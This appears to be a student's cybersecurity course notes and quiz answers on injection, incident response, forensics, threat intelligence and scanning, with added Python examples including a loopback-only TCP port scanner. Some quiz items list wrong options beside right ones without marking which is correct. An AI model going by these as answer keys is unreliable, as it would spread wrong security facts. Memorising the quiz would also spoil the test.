True or False: The use of object-relational mapping (ORM) libraries is a dangerous practice that can help hackers conduct successful SQL Injection attacks.
Which of the following statements is True?
Injection attacks were ranked #1 on the OWASP Top 10 list in 2013 and again in 2017.
Which vulnerability is being exploited in an OS Command Injection attack?
Poor user input sanitation and unsafe execution of OS commands.
What is a simple but effective way to protect against DLL hijacking?
use absolute paths
True or False: Safe coding practice runs code with the least possible privilege.
True or False: Safe coding practice always specifies relative paths when running applications or using shared libraries.
True or False: Safe coding practice does not let user input reach an OS command unchanged.
A hacker exfiltrating data by injecting an HTTP request command is an example of which type of SQL Injection attack?
Out of Band
Protecting against SQL Injection attacks by sanitizing user input can be accomplished by which two (2) of the following techniques?
Use of whitelists.
Use of mapping tables.
True or False: Limiting database user permissions is an ineffective strategy in preventing SQL Injection attacks since the injected code will run directly against the database regardless of the permission levels that have been set.
Which of the following will help reduce the SQL Injection attack surface?
Use of stored procedures.
When developing an application, using NoSQL instead of MySQL will have what effect on the application's susceptibility to SQL Injection attacks?
Reduce the attack surface, but not eliminate it
Penetration Testing, Incident Response and Forensics
General Methodology
Planning
Setting Objectives
Establishing Boundaries (Source)
Informing Need-to-know employees
Discovery
Vulnerability scanning
Google Dorks (Source)
Passive-Online
Wire sniffing
MitM
Replay attack
Active-Online
password brute-forcing
Network mapping
port scanning
trojan/spyware/keyloggers
hash injection (NTLM, LanMan)
Phishing
Offline Attacks
Pre-Computed hashes
Distributed Network Attack (DNA), password cracker
Rainbow
Tech-less
Social engineering
Shoulder surfing
Dumpster diving
Attack
Exploited vulnerabilities
misconfigurations
kernel flaws
insufficient input validation
symbolic links
file descriptor attacks
race conditions
buffer overflows
incorrect file and directory permissions
Report
Executive Summary
Background
Overall posture
risk ranking
general findings
recommendations
roadmap
30, 60, 90 day plan
Incident Response
General
Event -> Incident
Team Models: Central, Distributed, Coordinating
Common Attack Vectors
External/Removable Media
Attrition
Web
Email
Impersonation
Loss or Theft of Equipment
Baseline Questions; help coordinate with other teams and the media
Who attacked you? Why?
When and how did it happen?
Did this happen because you have poor security processes?
How widespread is the incident?
What steps are you taking to determine what happened and prevent future occurrences?
What is the impact? Any PII exposed? Estimated cost of incident?
Incident Response Continued
Phases
Preparation
Policy (Source)
IR Team, roles, means, tools, resources, policy testing, action plan
Risk assessment, network security, user awareness, host security, malware prevention
What types of events should trigger investigation?
What assets do we have?
Detection & Analysis
Precursor: sign incident may occur in future
e.g. log shows vulnerability scanning going on
Indicator: a sign that an incident may have occurred or may be occurring now
e.g. unusual deviation from typical network flow
Monitoring Systems
IDS vs IPS
DLP
SIEM
Documentation
current status, summary, indicators, related incidents, actions taken, chain of custody if applicable, impact assessments, contact info, evidence gathered, comments from incident handlers, next steps to be taken
Functional Impact Categories
None, Low, Medium, High: effect on ability to provide services to users
Information Impact Categories
None, Privacy Breach, Proprietary Breach, Integrity loss
Recoverability Effort Categories
Regular, Supplemented, Extended, Not Recoverable
Notifications
CIO, Local and Head of InfoSec, other incident response teams in or out of the org, system owner, HR, Public Affairs, legal department, law enforcement if appropriate
Containment, Eradication & Recovery
Containment: decision making is easier with predetermined procedures
Potential damage to and theft of resources
need for evidence preservation
service availability
time and resources needed to implement the strategy
effectiveness of the strategy
duration of the solution
Forensics in IR
Capture a backup image of the system as-is
Gather evidence
Follow chain of custody protocols
Eradication & Recovery
Deleting malware, disabling breached accounts, identifying and mitigating all vulnerabilities
Restoring systems from clean backups, rebuilding systems from scratch, replacing compromised files with clean versions, patching, changing passwords, tightening network perimeter security
A high level of testing and monitoring is often deployed to ensure restored systems are no longer impacted by the incident. This could take weeks or months depending on how long it takes to bring compromised systems back into production.
Checklist
Can problem be isolated? Are all affected systems isolated from non-affected systems? Have forensic copies of affected systems been created for further analysis?
If possible can the system be reimaged and then hardened with patches and/or other countermeasures to prevent or reduce the risk of attacks? Have all malware and other artifacts been removed, and systems hardened?
What tools are you going to use to test, monitor, and verify that the systems being restored to production are not compromised by the same methods that caused the original incident?
Post-incident Activity
Retrospective: what happened at what times? What info was needed sooner? Were procedures adequate? What could be done differently? Could communication be improved?
Utilizing data collected
Evidence retention
Documentation
Incident Response Demo
Common Threats
Software Attacks
Data exfiltration
Information Sabotage
Theft of equipment
Attack Vectors
Website hosting malicious content, countered by:
Qradar
McAfee ePolicy Orchestrator
Next generation firewalls
Questions
Which three (3) of the following are phases of an incident response?
Containment, Eradication & Recovery
Preparation
Detection & Analysis
Which statement is true about an event?
An event may be totally benign, like receiving an email.
True or False: A robust automated incident response system should be able to detect and prevent loss from all incidents.
A good automated Incident Response system should be able to detect which three (3) of these common attack vectors?
An email phishing attack.
An unauthorized removable drive being attached to the network.
A brute force hacking attack.
A former employee using his knowledge at a competitor company.
Which three (3) of the following are components of an Incident Response Policy?
IR Awareness training.
Means, tools and resources available.
Identity of IR team members.
IR Policy testing responsibility.
Contact information, Smart phones, and Secure storage facilities all belong to which Incident Response resource category?
Incident Handler Communications and Facilities.
Which three (3) of the following would be considered an incident detection precursor?
Detecting the use of a vulnerability scanner
An application log showing numerous failed login attempts from an unknown remote system.
A vendor notice of a vulnerability to a product you own.
An announced threat against your organization from an activist group.
True or False: The Incident Response team should keep their documentation as concise as possible so only the most important facts take up the attention of the team leadership.
What is the proper classification for a data breach that resulted in the exposure of sensitive personally identifiable information (PII)?
Privacy Breach
What is the proper classification for the recovery effort from a breach if you can estimate the total effort required but it will require bringing in additional resources?
Supplemented
During which stage of a comprehensive Containment, Eradication & Recovery strategy does NIST recommend considering the following: Potential damage to and theft of resources, Need for evidence preservation, and Service availability?
Containment
Which Post Incident activity would include ascertaining exactly what happened and at what times?
Lessons learned meeting
Which statement is true about an incident?
An incident is an event that negatively affects IT systems.
True or False: A Coordinating Incidents Response Team provides advice and guidance to the Distributed IR teams in each department, but generally does not have specific authority over those teams.
Which Incident Response Team model describes a team that has authority over all aspects of IR within the entire organization?
Central
In what way will having a set of predefined baseline questions help you in the event of an incident?
Coordinate with other teams and the media.
Incident Response team resources can be divided into which three (3) of the following categories?
Incident Analysis Hardware and Software
Incident Analysis Resources
Incident Handler Communications and Facilities
Port lists, Documentation, and Cryptographic hashes all belong to which Incident Response resource category?
Incident Analysis Hardware and Software
Incident Handler Communications and Facilities
Incident Analysis Resources
Incident Post-Analysis Resources
Which three (3) of the following would be considered an incident detection indicator?
The discovery of a file containing unusual characters by a system administrator.
Detecting the use of a vulnerability scanner.
A significant deviation from typical network traffic flow patterns.
An application log showing numerous failed login attempts from an unknown remote system.
Which type of monitoring system analyzes logs and events in real time?
SIEM
True or False: Highly detailed and thorough documentation is needed to support the analysis of current and future incidents.
What is the proper classification for a breach that results in sensitive or proprietary information being changed or deleted?
Integrity loss
What is the proper classification for the recovery effort from a breach if sensitive data was stolen and posted on a public web site?
Not Recoverable
During which stage of a comprehensive Containment, Eradication & Recovery strategy does NIST recommend considering the following: Eliminate components of the incident, Disable compromised accounts, and Identify and mitigate vulnerabilities?
Eradication
Which Post Incident activity would include reviewing response times, which systems were impacted and other metrics associated with the incident?
Utilizing collected data
Digital Forensics
Types of Data
CDs/DVDs
Internal/External drives
Volatile data
Network activity
Application usage
Portable digital devices
externally owned property
computer at home office
alternate sources of data
logs
keystroke monitoring
Objectives
Recover, analyze, preserve materials; in format useful as evidence in court of law
design procedures to ensure evidence is not corrupted
data acquisition and duplication
identify quickly, estimate potential impact
produce forensic report
preserve evidence by following chain of custody
Process
Collection
Develop plan
acquire
verify integrity; hashes
Examination
Bypassing controls: data compression, encryption, ACLs
Sea of Data: hundreds of thousands of files, not all relevant
Tools: filter and exclude data from searches
Analysis
putting the pieces together
IDS log, link event to host, host audit logs linking event to user account, host IDS log indicating what actions user performed
Reporting
If it's not in the report, you cannot testify about it.
Must detail the basis for your conclusions
Detail every test conducted, the methods and tools used, and results
Report Composition
Overview/Case Summary
Forensic Acquisition & Examination Preparations
Findings and Report (analysis)
Conclusion
SANS Institute Best Practices
screenshots
bookmark evidence via forensic app
built-in logging options within forensic tool
highlight and export data items into CSV or TXT files
digital audio recorder vs handwritten notes
Forensic Data
What's not there
Deleted files: pointer deleted, file might still exist
Slack space: if a file requires less space than the file allocation unit size, an entire file allocation unit is still reserved for the file
Free space: area on media that is not allocated to any partition may still contain pieces of data
MAC data
modification time, access time, creation time
Logical Backup vs Imaging
Logical: copies the directories and files of a logical volume, no deleted files or residual data stored in slack space
Imaging: bit-for-bit copy of original media
disk-to-disk or disk-to-file
should not be used on a live system since data is always changing
Tools for Techniques
File viewers
uncompressing files
GUI for data structures
identifying known files
string searches and pattern matches
metadata
Operating System Data
Collection & Prioritization of Volatile Data
slack space, free space, network config/connections, running processes, open files, login sessions, operating system time
Collecting non-volatile data
types: config files, logs, app files, data files, swap files, dump files, hibernation files, temp files
Power-Down options, File system data collected, users and groups, passwords, network shares, logs
Logs
network hack: collect logs of all network devices in route
unauthorized access: save web server logs, app server logs, app logs, router or switch logs, firewall logs, database logs, IDS logs, etc
trojan/worm/virus: save antivirus logs apart from the event logs (pertaining to the antivirus)
Windows
Recycle Bin, Registry, Thumbs.db, Files, Browser History, Print Spooling
MacOS
has forensic duplicate technique: Target Disk Mode
Linux
/etc/config
/etc/passwd
/var/log
/home/$USER
Application Data
Application Components
Config Settings
Config File
Runtime Options
Added to Source Code
Authentication
External
Proprietary
Pass-through
Host/user Environment
Logs
Event
Audit
Error
Installation
Debugging
Data
can live in memory or permanent files
file format can be generic or proprietary
may be in databases
some apps create temp files during session or improper shutdown
Supporting Files
Docs
Links
Graphics
App Architecture
Local
Client/Server
Peer-to-Peer
Types of Apps
Email
Web Usage
Web Data from Host
Favorite sites
History w/ timestamps of sites visited
cached web data files
cookies
Web Data from Server
Timestamps
IP addresses
Web Browser version
Type of request
Resource requested
Interactive messaging
IRC, IM, VoIP
File Sharing
Document usage
Security apps
Data Concealment tools
Network Data
Sources
Firewalls and Routers
Packet Sniffers and Protocol Analyzers
Intrusion Detection System
Security Event Management Software
Network Forensic Analysis Tools
Remote Access
Data Value
IDS: starting point for finding malicious activity
SEM: automatically bringing together multiple sources of information and presenting useful info
NFAT - Network Forensic Analysis Tool
Firewalls, Routers, Proxy Servers, & RAS
DHCP Servers: timestamps, who was using what IP when
Packet Sniffers: huge sea of info
Network Monitoring: finding variations from normal traffic flows
ISP records: useful to determine attacker
Attacker Identification
Contact IP Address Owner
Send Network Traffic - not recommended for orgs
Application Content - data packets could contain info of attacker's identity
Seek ISP assistance - requires court order and is done only to assist in the most serious of attacks
History of IP address - look for trends of suspicious activity
Questions
Digital forensics can be defined as the application of science to the identification, collection, examination, and analysis of data.
According to NIST, a forensic analysis should include four elements, Places, Items, Events and what?
People
True or False. A digital forensics report must contain details of every test conducted, the methods and tools used, and the results.
Which section of a digital forensics report would contain a list of the steps you have taken to ensure the integrity of the evidence?
Forensic Acquisition & Examination Preparation
Network activity, Application usage, Logs and Keystroke monitoring are all sources of what?
Data
What are the three (3) main hurdles that must be overcome when examining data? (Select 3)
Dealing with a sea of data. A single hard drive will contain many thousands of files that are not relevant to our investigation.
Selecting the most effective tools to help with the searching and filtering of data.
Bypassing controls such as operating system and encryption passwords.
True or False. Only data files can be effectively analyzed during a forensic analysis.
Most data files are smaller than the number of blocks allocated to their storage by the file system; the unused space is known as what?
Slack space
True or False. When collecting forensic data from a running system, you should always attempt to collect volatile data first.
Which of these applications would likely be of the most interest in a forensic analysis?
Patch files
Operating system DLLs
Email
OSI Application Layer protocols
Digital forensics is commonly applied to which of the following activities?
Criminal investigation
Incident handling
Data recovery
All of the above
NIST includes which three (3) as steps in collecting data? (Select 3)
Acquire the data
Develop a plan to acquire the data
Verify the integrity of the data
Normalize the data
What is the primary purpose of maintaining a chain of custody?
To avoid allegations of mishandling or tampering of evidence.
True or False. Digital forensics had been used to solve a number of high-profile violent crimes.
True or False. A digital forensics report is a summary of your findings. If your case goes to trial, your testimony can, and usually does, involve far more detail than is in the report.
Which section of a digital forensics report would include best practices such as taking lots of screenshots, using the built-in logging options of your digital forensics tools, and exporting key data items into a .csv or .txt file?
Findings & Analysis
Which types of files are appropriate subjects for forensic analysis?
Data files
Image and video files
Application files
All of the above
Deleting a file results in what action by most operating systems?
The memory registers used by the file are marked as available for new storage but are otherwise not changed.
Forensic analysis should always be conducted on a copy of the original data. What type of copying is appropriate for getting data from a live system that cannot be taken offline?
A logical backup
How does a forensic analysis use hash sets acquired from NIST's Software Reference Library project?
They can quickly eliminate known good operating system and application files from consideration.
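Worked example for the two questions above on verifying integrity and on using known-good hash sets (added here; not course material and not from the original notes). The NSRL Reference Data Set publishes SHA-1 and MD5 hashes of known software files; the code below stands in for it with a constructed set of SHA-1 values, filters an in-memory stand-in for a disk image down to the files that are not known-good, and shows the acquisition-time hash record used to prove the evidence was not altered. All file names and contents are constructed.

```python
import hashlib

def sha1_hex(data: bytes) -> str:
    return hashlib.sha1(data).hexdigest()

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

# Constructed in-memory "image": path -> content. Not a real disk image.
IMAGE_FILES = {
    "Windows/System32/kernel32.dll": b"KNOWN GOOD SYSTEM FILE (constructed)",
    "Program Files/App/app.exe": b"KNOWN GOOD APPLICATION (constructed)",
    "Users/jsmith/Downloads/invoice.pdf.exe": b"MZ\x90\x00 suspicious downloaded binary (constructed)",
    "Users/jsmith/Documents/notes.txt": b"meeting notes (constructed)",
}

# Constructed stand-in for the NSRL RDS: SHA-1 values of files known to ship with an OS or product.
KNOWN_GOOD_SHA1 = {
    sha1_hex(IMAGE_FILES["Windows/System32/kernel32.dll"]),
    sha1_hex(IMAGE_FILES["Program Files/App/app.exe"]),
}

def filter_known_good(files, known_good):
    """Return the paths whose SHA-1 is NOT in the known-good set: what is left to examine."""
    return sorted(p for p, data in files.items() if sha1_hex(data) not in known_good)

def acquisition_record(files):
    """Hash every file at acquisition time. This record travels with the evidence
    as part of the chain of custody so later tampering claims can be refuted."""
    return {p: sha256_hex(d) for p, d in files.items()}

def verify_integrity(files, record):
    """Re-hash the working copy and return the paths whose hash changed (empty = intact)."""
    return sorted(p for p, d in files.items() if sha256_hex(d) != record.get(p))

if __name__ == "__main__":
    record = acquisition_record(IMAGE_FILES)
    print("still to examine:", filter_known_good(IMAGE_FILES, KNOWN_GOOD_SHA1))
    print("changed since acquisition:", verify_integrity(IMAGE_FILES, record))
```

A hash-set match only says the file is identical to a known distribution file; it says nothing about whether that file was used maliciously, so the filter reduces the "sea of data" rather than clearing the host.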
Which three (3) of the following data types are considered non-volatile? (Select 3)
Dump files
Free space
Swap files
Logs
Configuration files are considered which data type?
Non-volatile
Which three (3) of the following are application components? (Select 3)
Application architecture
Authentication mechanisms
OSI Application Layer protocols
Data files
Which of these applications would likely be of the least interest in a forensic analysis?
Patch files
The Internet layer of the TCP/IP stack, also known as the Network layer in the OSI model, contains which two (2) protocols that are very useful to a forensic investigation? (Select 2)
UDP
ICMP
IPv4 / IPv6
LDAP
Which device would you inspect if you were looking for event data correlated across a number of different network devices?
Security Event Management (SEM) software (see the Network Data notes above: a firewall only holds its own logs, while SEM software brings multiple sources together)
Which of these sources might require a court order in order to obtain the data for forensic analysis?
ISP records
Scripting
How many spaces must be used to indent a block of code in Python?
Any number 1 or more as long as the same indentation is used within a code block.
Cyber Threat Intelligence
Threat Intelligence
Security Drivers
breached records
human error
IoT innovation
breach cost amplifiers (3rd parties, cloud migration, system complexity)
skills gap
$3.92M average total cost of a data breach (2019)
Insider Threats
Questions
Which three (3) of these were among the top 5 security drivers in 2019? (Select 3)
New security and privacy laws that went into effect in 2019
Human error accounting for the majority of security breaches
The number of breached records in 2019 more than 3 times that of 2018
IOT device attacks moving from targeting consumer electronics to targeting enterprise devices
What was the average cost of a data breach in 2019 in US dollars?
$3.92M
What was the average size of a data breach in 2019?
25575 records
According to the Threat Intelligence Strategy Map, The threat intelligence process can be broken down into 4 steps: Collect, Process, Analyze, and Share. Which step would contain activities such as gathering data from internal, external, technical and human sources?
Collect
Crowdstrike organizes threat intelligence into which three (3) areas? (Select 3)
Operational
Strategic
Tactical
According to the Crowdstrike model, Endpoints, SIEMs and Firewalls belong in which intelligence area?
Tactical
Which three (3) sources are recommended reading for any cybersecurity professional? (Select 3)
DarkReading
Trend Micro
BleepingComputer
Which two (2) of these were among the 4 threat intelligence platforms covered in the Threat Intelligence Platforms video? (Select 2)
FireEye
Recorded Future
True or False. The average enterprise has 85 different security tools from 45 vendors.
Which threat intelligence framework can be described as a system that is effective if there are only 2 players and the adversary is motivated by socioeconomic or sociopolitical payoffs?
Diamond Model of Intrusion Analysis
True or False. An organization's security immune system should not be considered fully integrated until it is integrated with the extended partner ecosystem.
Which term can be defined as "The real-time collection, normalization, and analysis of the data generated by users, applications, and infrastructure that impacts the IT security and risk posture of an enterprise"?
Security Intelligence
What are the three (3) pillars of effective threat detection? (Select 3)
See everything
Become proactive
Automate intelligence
True or False. According to the FireEye Mandiant's Security Effectiveness Report 2020, organizations have an average of 50-70 security tools in their IT environments.
What was the average time to identify and contain a breach in 2019?
279 days
Which industry had the highest average cost per breach in 2019 at $6.45M
Healthcare
Breaches caused by which source resulted in the highest cost per incident in 2019?
Credentials theft
According to the Threat Intelligence Strategy Map, The threat intelligence process can be broken down into 4 steps: Collect, Process, Analyze, and Share. Which step would contain activities such as normalize, correlate, confirm and enrich the data?
Process
According to the Threat Intelligence Strategy Map, The threat intelligence process can be broken down into 4 steps: Collect, Process, Analyze, and Share. Which step would contain activities such as investigate, contain, remediate and prioritize?
Analyze
According to the Crowdstrike model, threat hunters, vulnerability management and incident response belong in which intelligence area?
Operational
Which three (3) sources are recommended reading for any cybersecurity professional? (Select 3)
X-Force Exchange
InfoSecurity Magazine
Krebs on Security
Which two (2) of these were among the 4 threat intelligence platforms covered in the Threat Intelligence Platforms video? (Select 2)
TruSTAR
IBM X-Force Exchange
Which threat intelligence framework is divided into 3 levels? Level one is getting to know your adversaries, level 2 involves mapping intelligence yourself, and level 3 is where you map more information and use that to plan your defense.
MITRE ATT&CK knowledge base
True or False. An organization's security immune system should be isolated from outside organizations, including vendors and other third-parties to keep it from being compromised.
Activities performed as a part of security intelligence can be divided into pre-exploit and post-exploit activities. Which two (2) of these are pre-exploit activities? (Select 2)
Prioritize vulnerabilities to optimize remediation processes and close critical exposures
Detect deviations from the norm that indicate early warnings of APTs
Gather full situational awareness through advanced security analytics
Perform forensic investigation
True or False. According to the FireEye Mandiant Security Effectiveness Report 2020, more than 50% of successful attacks are able to infiltrate without detection.
Data Loss Prevention and Mobile Endpoint Protection
A student's grades should be visible to that student when she logs in to her university account. Her ability to see her grades is an example of which aspect of the CIA Triad?
Availability
A university has implemented practices that ensures all student data is encrypted while stored on university servers. Which aspect of the CIA Triad does this practice support?
Confidentiality
The Student Portal of a university issues a confirmation code with a hash value each time a student submits an assignment using the portal. This is an example of which aspect of the CIA Triad?
Integrity
True or False. An organization has "air gapped" its small network of critical data servers so they are accessible internally but not to any external system. These systems are now safe from a deliberate attack.
C-level executives face 4 challenges when assuring their organizations maintain a comprehensive, workable data security solution. The proliferation of smartphones used for work would impact which two (2) of these concerns the most? (Select 2)
New privacy regulations
Explosive data growth
True or False. An organization is subject to both GDPR and PCI-DSS data security regulations and has dedicated all of its efforts in remaining in compliance with these 2 sets of regulations. They are correct in believing that their data is safe.
True or False. A newly hired CISO made the right choice when he moved the Known Vulnerabilities list to a high priority for his team to resolve even though none of these had ever been exploited on the company's network to-date.
All industries have their own unique data security challenges. Which of these industries has a particular concern with HIPAA compliance and the highest cost per breached record?
Healthcare
All industries have their own unique data security challenges. Which of these industries has a particular concern with being targeted more than any other by cybercriminals "because that is where the money is"?
Financial
Which three (3) of these are among the top 12 capabilities that a good data security and protection solution should provide? (Select 3)
Data discovery
Blocking, masking and quarantining
Data risk analysis
Parsing discovered data against known patterns or key words is a process known as what?
Data classification
Which data protection process takes data activity monitoring output and uses it to generate insights about threats?
Active analytics
True or False. The Guardium administrator needs to be someone with the highest level of access to the data being protected.
Which mobile operating system runs the majority of smartphones today?
Android
Which mobile operating system runs approximately 60% of tablet computers worldwide?
iOS
True or False. Security is enhanced on iOS mobile devices because users typically cannot interact directly with the operating system.
Which statement best describes the use of anti-virus software on mobile devices?
Antivirus software can "see" the apps that are running on a mobile device but cannot see the data that is associated with each app.
Which type of threat is Jailbreaking?
System based
On a mobile device, which type of threat is a phishing scam?
App based
True or False. An operator who corrupts data by mistake is considered an "inadvertent attack" that should be considered when developing data protection plans.
C-level executives face 4 challenges when assuring their organizations maintain a comprehensive and workable data security solution. GDPR, CCPA, and PCI-DSS are concerned with which one of these challenges?
New privacy regulations
True or False. A biotech research company with a very profitable product line has grown so rapidly it has acquired a marketing company, a small IT services company and a company that specializes in pharmaceutical manufacturing and distribution. The CEO of the parent company made a good decision when he decided not to consolidate all data security under a single CISO, believing that each of the new divisions understands its own data security needs better than the parent company possibly could.
What are the 5 common pitfalls of data security?
Failure to move beyond compliance
Failure to recognize the need for centralized data security
Failure to define who owns responsibility for the data itself
Failure to address known vulnerabilities
Failure to prioritize and leverage data activity monitoring
All industries have their own unique data security challenges. Which of these industries has a particular concern with a widely distributed IT infrastructure that must provide services across multiple government jurisdictions while not violating the privacy concerns of its users?
Transportation
Which three (3) of these are among the top 12 capabilities that a good data security and protection solution should provide? (Select 3)
Data classification
Encryption
Data and file monitoring
Which is the data protection process that addresses inappropriate privileges, insecure authentication methods, account sharing, configuration files and missing security patches?
Vulnerability assessment
Which data protection process substitutes key data with a token that is issued by a trusted third-party where the token can be accessed but not redeemed by an untrusted party?
Tokenization
Scanning
Which component of a vulnerability scanner would perform security checks according to its installed plug-ins?
Engine Scanner
Which component of a vulnerability scanner stores vulnerability information and scan results?
Database
How does a vulnerability scanner detect internal threats?
By scanning hosts
In which component of a Common Vulnerability Score (CVSS) would the attack vector be reflected?
Base-Exploitability Subscore
In which component of a Common Vulnerability Score (CVSS) would confidentiality be reflected?
Base-Impact Subscore
In which component of a Common Vulnerability Score (CVSS) would exploit code maturity be reflected?
Temporal Score
True or False. The US Dept of Defense has produced a number of Security Technical Implementation Guides to show the most secure ways to deploy common software packages such as operating systems, open source software, and network devices. These guides are available to the public and can be freely downloaded.
The Center for Internet Security (CIS) has implementation groups that rank from the least secure to the most secure. Which of these has the least stringent security requirements?
a) CIS Sub-Controls for small, commercial off-the-shelf or home office software environments.
b) CIS Sub-Controls focused on helping security teams manage sensitive client or company information.
c) CIS Sub-Controls that reduce the impact of zero-day and targeted attacks from sophisticated adversaries.
Which three (3) of these are identified by a basic port scanner? (Select 3)
Available services provided by the target system
A list of Open ports on a target system
Active hosts using TCP
Port numbers 49152 through 65535 are known as what?
Dynamic and Private Ports
What are the three (3) responses a port scanner might receive when it is scanning a system for open ports? (Select 3)
Open
Filtered (or blocked)
Closed
Which type of scan is commonly used to check if a working system is at the address indicated and that it is responding?
Ping (ICMP Echo Request)
Which type of scan sends an empty packet, or a packet with a different payload for each port scanned, and receives a response only for closed ports?
UDP port scan
Which two (2) of these are other names for a protocol analyzer? (Select 2)
Packet analyzer
Network analyzer
Which is the most popular packet sniffer used?
WireShark
Ports 0–1023 – system or well-known ports
Ports 1024–49151 – user or registered ports
Ports 49152–65535 – dynamic / private / ephemeral ports
Which type of scan notes the connection but leaves the target hanging, i.e. does not reveal any information to the target about the host that initiated the scan?
TCP/Half Open Scan (aka a SYN scan)
Which two (2) of these are other names for a protocol analyzer? (Select 2)
Traffic analyzer
Sniffer
True or False. Packet sniffers are used by hackers but have no place in legitimate network management.
Which component of a vulnerability scanner provides high-level graphs and trend reports for executive leadership?
Report Module
How does a vulnerability scanner detect external threats?
By scanning internet facing hosts from the Internet
If a port is blocked, what response will be sent to the port scanner?
There will be no response
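Worked example for the port scanning questions above (added here; not course material and not from the original notes). It performs a TCP connect scan and maps the three outcomes the quiz lists onto what actually comes back on the wire: a completed handshake is open, an RST (connection refused) is closed, and silence until the timeout is filtered, which is the "no response" case for a blocked port. It also classifies port numbers into the three IANA ranges from the notes. The target is a throwaway listener the script itself starts on loopback, so nothing external is scanned.

```python
import errno
import socket
import threading

def port_range_name(port):
    """IANA range a port number falls in (the three ranges listed in the notes above)."""
    if 0 <= port <= 1023:
        return "well-known"
    if 1024 <= port <= 49151:
        return "registered"
    if 49152 <= port <= 65535:
        return "dynamic/private"
    raise ValueError(f"port out of range: {port}")

def tcp_connect_scan(host, port, timeout=1.0):
    """Full TCP connect scan of one port. Returns 'open', 'closed' or 'filtered'.

    open     : the three-way handshake completed (target answered SYN/ACK)
    closed   : the target answered with RST (connection refused)
    filtered : nothing came back before the timeout (a firewall silently dropped the SYN)
    A connect scan completes the handshake, so unlike a SYN (half-open) scan it is
    seen and logged by the application listening on the port.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"
    except ConnectionRefusedError:
        return "closed"
    except (socket.timeout, TimeoutError):
        return "filtered"
    except OSError as exc:
        # No route / network unreachable: the SYN never got an answer either.
        if exc.errno in (errno.EHOSTUNREACH, errno.ENETUNREACH):
            return "filtered"
        raise
    finally:
        s.close()

def scan_ports(host, ports, timeout=1.0):
    """Scan a list of ports and return {port: state}."""
    return {p: tcp_connect_scan(host, p, timeout) for p in ports}

def _loopback_listener():
    """Constructed target: a throwaway listener on an ephemeral loopback port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
                conn.close()
            except OSError:
                return

    threading.Thread(target=serve, daemon=True).start()
    return srv

def _unused_loopback_port():
    """Ask the kernel for a free ephemeral port, then release it so nothing listens there."""
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))
    port = tmp.getsockname()[1]
    tmp.close()
    return port

def demo():
    """Scan one listening and one unused loopback port; returns (results, open_port, closed_port)."""
    srv = _loopback_listener()
    open_port = srv.getsockname()[1]
    closed_port = _unused_loopback_port()
    try:
        return scan_ports("127.0.0.1", [open_port, closed_port]), open_port, closed_port
    finally:
        srv.close()

if __name__ == "__main__":
    results, _, _ = demo()
    for port, state in results.items():
        print(f"{port:>5} ({port_range_name(port)}): {state}")
```

The "filtered" branch cannot be demonstrated on loopback, because the local stack always answers; against a real host behind a firewall that drops inbound SYNs, every probe ends in the timeout branch, which is why a blocked port produces no response rather than an error.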
Application and Security Testing
Enterprise Architecture
considers the needs of the whole enterprise within scope (org or department)
maps the main components of the problem space at a very high level
Solution Architecture
describes the main elements, showing internal architecture, stored data, and the use of components/patterns
Architectural Building Blocks (ABBs) and Solution Building Blocks (SBBs)
ABB
Data Sec, AppSec, IAM, Infrastructure and Endpoint Sec, Detect and Respond
SBB
Key Security Manager, Certificate Authority, HSM, WAF, SAST, Directory, Privilege Access Manager, Hardware Token, Virus protection, App firewall, SPAM filter, Network intrusion prevention system, incident workflow manager
True or False. A security architect's job is to make sure that security considerations dominate other design aspects such as usability, resilience and cost.
Which of these is an aspect of an Enterprise Architecture?
Considers the needs of the entire organization
Which of these is an aspect of a Solution Architecture?
Describes how specific products or technologies are used
Which three (3) of these are general features of Building Blocks? (Select 3)
May be product or vendor aware
Defined boundary, but can work with other building blocks
Could be an actor, business service, application or data
Package of function defined to meet a business need
In security architecture, a reusable solution to a commonly recurring problem is known as what?
a pattern
What is lacking in a security architecture pattern that prevents it from being used as a finished design?
context
What are the possible consequences if a bug in your application becomes known?
It is embarrassing to your company
Financial losses via lawsuits and fines can be very significant
Government agencies can impose fines and other sanctions against your company
All of the above
Failure to use input validation in your application introduces what?
A vulnerability
Which software development lifecycle is characterized as a top-down approach where one stage of the project is completed before the next stage begins?
Waterfall
Which form of penetration testing allows the testers complete knowledge of the systems they are trying to penetrate in advance of their attack to simulate an internal attack from a knowledgeable insider?
White Box testing
Which application testing method requires access to the original application source code?
SAST: Static Application Security Testing
Which three (3) steps are part of a Supplier Risk Assessment? (Select 3)
Identify mitigations that would minimize or eliminate the risk
Identify how the risk would impact the business
Identify how any risks would impact your organization's business
Determine the likelihood the risk would interrupt the business
What type of firewall should you install to protect applications used by your organization from hacking?
WAF
Which of these threat modeling methodologies was introduced in 1999 at Microsoft to provide their developers a mnemonic that would help them find security vulnerabilities in their products?
STRIDE
What was the ultimate consequence to Target Stores in the United States from their 2013 data breach in which over 100M records were stolen?
Costs of $10M and reputational damage only.
Select the two (2) top vulnerabilities found in common security products. (Select 2)
Cross-site request forgery
Cross-site scripting
True or False. If you can isolate your product from the Internet, it is safe from being hacked.
Which three (3) things can Cross-site scripting be used for?
Take over sessions
Steal cookies
Break encryption
Harvest credentials
True or False. Commonly a Reflected XSS attack is sent as part of an email or a malicious link and affects only the user who receives the email or link.
Cross-site scripting attacks can be minimized by using HTML and URL Encoding. How would a browser display this encoded string?: &lt;b&gt;Password&lt;/b&gt;
<b>Password</b> (shown as literal text; the entities are decoded for display but not parsed as markup, so the word is not rendered in bold)
Which three (3) statements about whitelisting user input are true?
Special characters should only be allowed on an exception basis
Whitelisting reduces the attack surface to a known quantity
Whenever possible, input should be whitelisted to alphanumeric values to prevent XSS
Which two (2) statements are considered good practice for avoiding XSS attacks?
Use strict whitelists on accepting input
Encode all data output as part of HTML and JavaScript
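Worked example for the XSS questions above on whitelisting input and encoding output (added here; not course material and not from the original notes). It shows the same greeting rendered with and without HTML encoding, the encoded form of the quiz's <b>Password</b> string, a separate encoder for a JavaScript string context (HTML encoding alone does not protect that context), and an alphanumeric whitelist of the kind the notes recommend. The attack string is constructed for illustration.

```python
import html
import re

# Whitelist: alphanumeric only, as the notes recommend; widen deliberately per field when needed.
USERNAME_RE = re.compile(r"^[A-Za-z0-9]{1,32}$")

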